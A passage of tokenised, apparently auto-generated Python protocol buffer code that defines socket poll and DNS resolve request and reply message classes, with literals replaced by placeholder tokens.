<NUM_LIT:3> <EOL> kreceived_from = <NUM_LIT:4> <EOL> kbuffer_size = <NUM_LIT:5> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT:data>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> } , <NUM_LIT:5> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:5> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class PollEvent ( ProtocolBuffer . ProtocolMessage ) : <EOL> SOCKET_POLLNONE = <NUM_LIT:0> <EOL> SOCKET_POLLIN = <NUM_LIT:1> <EOL> SOCKET_POLLPRI = <NUM_LIT:2> <EOL> SOCKET_POLLOUT = <NUM_LIT:4> <EOL> SOCKET_POLLERR = <NUM_LIT:8> <EOL> SOCKET_POLLHUP = <NUM_LIT:16> <EOL> SOCKET_POLLNVAL = <NUM_LIT:32> <EOL> SOCKET_POLLRDNORM = <NUM_LIT:64> <EOL> SOCKET_POLLRDBAND = <NUM_LIT> <EOL> SOCKET_POLLWRNORM = <NUM_LIT> <EOL> SOCKET_POLLWRBAND = <NUM_LIT> <EOL> SOCKET_POLLMSG = <NUM_LIT> <EOL> SOCKET_POLLREMOVE = <NUM_LIT> <EOL> SOCKET_POLLRDHUP = <NUM_LIT> <EOL> _PollEventFlag_NAMES = { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <EOL> <NUM_LIT:16> : "<STR_LIT>" , <EOL> <NUM_LIT:32> : "<STR_LIT>" , <EOL> <NUM_LIT:64> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> } <EOL> def PollEventFlag_Name ( cls , x ) : return cls . _PollEventFlag_NAMES . get ( x , "<STR_LIT>" ) <EOL> PollEventFlag_Name = classmethod ( PollEventFlag_Name ) <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_requested_events_ = <NUM_LIT:0> <EOL> requested_events_ = <NUM_LIT:0> <EOL> has_observed_events_ = <NUM_LIT:0> <EOL> observed_events_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def requested_events ( self ) : return self . requested_events_ <EOL> def set_requested_events ( self , x ) : <EOL> self . has_requested_events_ = <NUM_LIT:1> <EOL> self . requested_events_ = x <EOL> def clear_requested_events ( self ) : <EOL> if self . has_requested_events_ : <EOL> self . has_requested_events_ = <NUM_LIT:0> <EOL> self . requested_events_ = <NUM_LIT:0> <EOL> def has_requested_events ( self ) : return self . has_requested_events_ <EOL> def observed_events ( self ) : return self . observed_events_ <EOL> def set_observed_events ( self , x ) : <EOL> self . has_observed_events_ = <NUM_LIT:1> <EOL> self . observed_events_ = x <EOL> def clear_observed_events ( self ) : <EOL> if self . has_observed_events_ : <EOL> self . has_observed_events_ = <NUM_LIT:0> <EOL> self . observed_events_ = <NUM_LIT:0> <EOL> def has_observed_events ( self ) : return self . has_observed_events_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_requested_events ( ) ) : self . set_requested_events ( x . requested_events ( ) ) <EOL> if ( x . has_observed_events ( ) ) : self . set_observed_events ( x . observed_events ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_requested_events_ != x . has_requested_events_ : return <NUM_LIT:0> <EOL> if self . has_requested_events_ and self . requested_events_ != x . requested_events_ : return <NUM_LIT:0> <EOL> if self . has_observed_events_ != x . has_observed_events_ : return <NUM_LIT:0> <EOL> if self . has_observed_events_ and self . observed_events_ != x . observed_events_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_requested_events_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_observed_events_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += self . lengthVarInt64 ( self . requested_events_ ) <EOL> n += self . lengthVarInt64 ( self . observed_events_ ) <EOL> return n + <NUM_LIT:3> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_requested_events_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . requested_events_ ) <EOL> if ( self . has_observed_events_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . observed_events_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_requested_events ( ) <EOL> self . clear_observed_events ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . requested_events_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . observed_events_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_requested_events_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . requested_events_ ) <EOL> if ( self . has_observed_events_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . observed_events_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_requested_events ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_observed_events ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_requested_events_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . requested_events_ ) ) <EOL> if self . has_observed_events_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . observed_events_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> krequested_events = <NUM_LIT:2> <EOL> kobserved_events = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class PollRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_timeout_seconds_ = <NUM_LIT:0> <EOL> timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . events_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def events_size ( self ) : return len ( self . events_ ) <EOL> def events_list ( self ) : return self . events_ <EOL> def events ( self , i ) : <EOL> return self . events_ [ i ] <EOL> def mutable_events ( self , i ) : <EOL> return self . events_ [ i ] <EOL> def add_events ( self ) : <EOL> x = PollEvent ( ) <EOL> self . events_ . append ( x ) <EOL> return x <EOL> def clear_events ( self ) : <EOL> self . events_ = [ ] <EOL> def timeout_seconds ( self ) : return self . timeout_seconds_ <EOL> def set_timeout_seconds ( self , x ) : <EOL> self . has_timeout_seconds_ = <NUM_LIT:1> <EOL> self . timeout_seconds_ = x <EOL> def clear_timeout_seconds ( self ) : <EOL> if self . has_timeout_seconds_ : <EOL> self . has_timeout_seconds_ = <NUM_LIT:0> <EOL> self . timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def has_timeout_seconds ( self ) : return self . has_timeout_seconds_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . events_size ( ) ) : self . add_events ( ) . CopyFrom ( x . events ( i ) ) <EOL> if ( x . has_timeout_seconds ( ) ) : self . set_timeout_seconds ( x . timeout_seconds ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . events_ ) != len ( x . events_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . events_ , x . events_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ != x . has_timeout_seconds_ : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ and self . timeout_seconds_ != x . timeout_seconds_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . events_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . events_ ) <EOL> for i in xrange ( len ( self . events_ ) ) : n += self . lengthString ( self . events_ [ i ] . ByteSize ( ) ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . events_ ) <EOL> for i in xrange ( len ( self . events_ ) ) : n += self . lengthString ( self . events_ [ i ] . ByteSizePartial ( ) ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_events ( ) <EOL> self . clear_timeout_seconds ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . events_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . events_ [ i ] . ByteSize ( ) ) <EOL> self . events_ [ i ] . OutputUnchecked ( out ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . events_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . events_ [ i ] . ByteSizePartial ( ) ) <EOL> self . events_ [ i ] . OutputPartial ( out ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_events ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_timeout_seconds ( d . getDouble ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . events_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> if self . has_timeout_seconds_ : res += prefix + ( "<STR_LIT>" % self . DebugFormat ( self . timeout_seconds_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kevents = <NUM_LIT:1> <EOL> ktimeout_seconds = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . DOUBLE , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class PollReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> self . events_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def events_size ( self ) : return len ( self . events_ ) <EOL> def events_list ( self ) : return self . events_ <EOL> def events ( self , i ) : <EOL> return self . events_ [ i ] <EOL> def mutable_events ( self , i ) : <EOL> return self . events_ [ i ] <EOL> def add_events ( self ) : <EOL> x = PollEvent ( ) <EOL> self . events_ . append ( x ) <EOL> return x <EOL> def clear_events ( self ) : <EOL> self . events_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . events_size ( ) ) : self . add_events ( ) . CopyFrom ( x . events ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . events_ ) != len ( x . events_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . events_ , x . events_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . events_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . events_ ) <EOL> for i in xrange ( len ( self . events_ ) ) : n += self . lengthString ( self . events_ [ i ] . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . events_ ) <EOL> for i in xrange ( len ( self . events_ ) ) : n += self . lengthString ( self . events_ [ i ] . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_events ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . events_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . events_ [ i ] . ByteSize ( ) ) <EOL> self . events_ [ i ] . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . events_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . events_ [ i ] . ByteSizePartial ( ) ) <EOL> self . events_ [ i ] . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_events ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . events_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kevents = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ResolveRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_name_ = <NUM_LIT:0> <EOL> name_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> self . address_families_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def name ( self ) : return self . name_ <EOL> def set_name ( self , x ) : <EOL> self . has_name_ = <NUM_LIT:1> <EOL> self . name_ = x <EOL> def clear_name ( self ) : <EOL> if self . has_name_ : <EOL> self . has_name_ = <NUM_LIT:0> <EOL> self . name_ = "<STR_LIT>" <EOL> def has_name ( self ) : return self . has_name_ <EOL> def address_families_size ( self ) : return len ( self . address_families_ ) <EOL> def address_families_list ( self ) : return self . address_families_ <EOL> def address_families ( self , i ) : <EOL> return self . address_families_ [ i ] <EOL> def set_address_families ( self , i , x ) : <EOL> self . address_families_ [ i ] = x <EOL> def add_address_families ( self , x ) : <EOL> self . address_families_ . append ( x ) <EOL> def clear_address_families ( self ) : <EOL> self . address_families_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_name ( ) ) : self . set_name ( x . name ( ) ) <EOL> for i in xrange ( x . address_families_size ( ) ) : self . add_address_families ( x . address_families ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_name_ != x . has_name_ : return <NUM_LIT:0> <EOL> if self . has_name_ and self . name_ != x . name_ : return <NUM_LIT:0> <EOL> if len ( self . address_families_ ) != len ( x . address_families_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . address_families_ , x . address_families_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_name_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . name_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . address_families_ ) <EOL> for i in xrange ( len ( self . address_families_ ) ) : n += self . lengthVarInt64 ( self . address_families_ [ i ] ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_name_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . name_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . address_families_ ) <EOL> for i in xrange ( len ( self . address_families_ ) ) : n += self . lengthVarInt64 ( self . address_families_ [ i ] ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_name ( ) <EOL> self . clear_address_families ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . name_ ) <EOL> for i in xrange ( len ( self . address_families_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . address_families_ [ i ] ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_name_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . name_ ) <EOL> for i in xrange ( len ( self . address_families_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . address_families_ [ i ] ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_name ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . add_address_families ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_name_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . address_families_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % ( elm , self . DebugFormatInt32 ( e ) ) ) <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kname = <NUM_LIT:1> <EOL> kaddress_families = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:name>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ResolveReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> SOCKET_EAI_ADDRFAMILY = <NUM_LIT:1> <EOL> SOCKET_EAI_AGAIN = <NUM_LIT:2> <EOL> SOCKET_EAI_BADFLAGS = <NUM_LIT:3> <EOL> SOCKET_EAI_FAIL = <NUM_LIT:4> <EOL> SOCKET_EAI_FAMILY = <NUM_LIT:5> <EOL> SOCKET_EAI_MEMORY = <NUM_LIT:6> <EOL> SOCKET_EAI_NODATA = <NUM_LIT:7> <EOL> SOCKET_EAI_NONAME = <NUM_LIT:8> <EOL> SOCKET_EAI_SERVICE = <NUM_LIT:9> <EOL> SOCKET_EAI_SOCKTYPE = <NUM_LIT:10> <EOL> SOCKET_EAI_SYSTEM = <NUM_LIT:11> <EOL> SOCKET_EAI_BADHINTS = <NUM_LIT:12> <EOL> SOCKET_EAI_PROTOCOL = <NUM_LIT> <EOL> SOCKET_EAI_OVERFLOW = <NUM_LIT> <EOL> SOCKET_EAI_MAX = <NUM_LIT:15> <EOL> _ErrorCode_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , <EOL> <NUM_LIT:10> : "<STR_LIT>" , <EOL> <NUM_LIT:11> : "<STR_LIT>" , <EOL> <NUM_LIT:12> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:15> : "<STR_LIT>" , <EOL> } <EOL> def ErrorCode_Name ( cls , x ) : return cls . _ErrorCode_NAMES . get ( x , "<STR_LIT>" ) <EOL> ErrorCode_Name = classmethod ( ErrorCode_Name ) <EOL> has_canonical_name_ = <NUM_LIT:0> <EOL> canonical_name_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> self . packed_address_ = [ ] <EOL> self . aliases_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def packed_address_size ( self ) : return len ( self . packed_address_ ) <EOL> def packed_address_list ( self ) : return self . packed_address_ <EOL> def packed_address ( self , i ) : <EOL> return self . packed_address_ [ i ] <EOL> def set_packed_address ( self , i , x ) : <EOL> self . packed_address_ [ i ] = x <EOL> def add_packed_address ( self , x ) : <EOL> self . packed_address_ . append ( x ) <EOL> def clear_packed_address ( self ) : <EOL> self . packed_address_ = [ ] <EOL> def canonical_name ( self ) : return self . canonical_name_ <EOL> def set_canonical_name ( self , x ) : <EOL> self . has_canonical_name_ = <NUM_LIT:1> <EOL> self . canonical_name_ = x <EOL> def clear_canonical_name 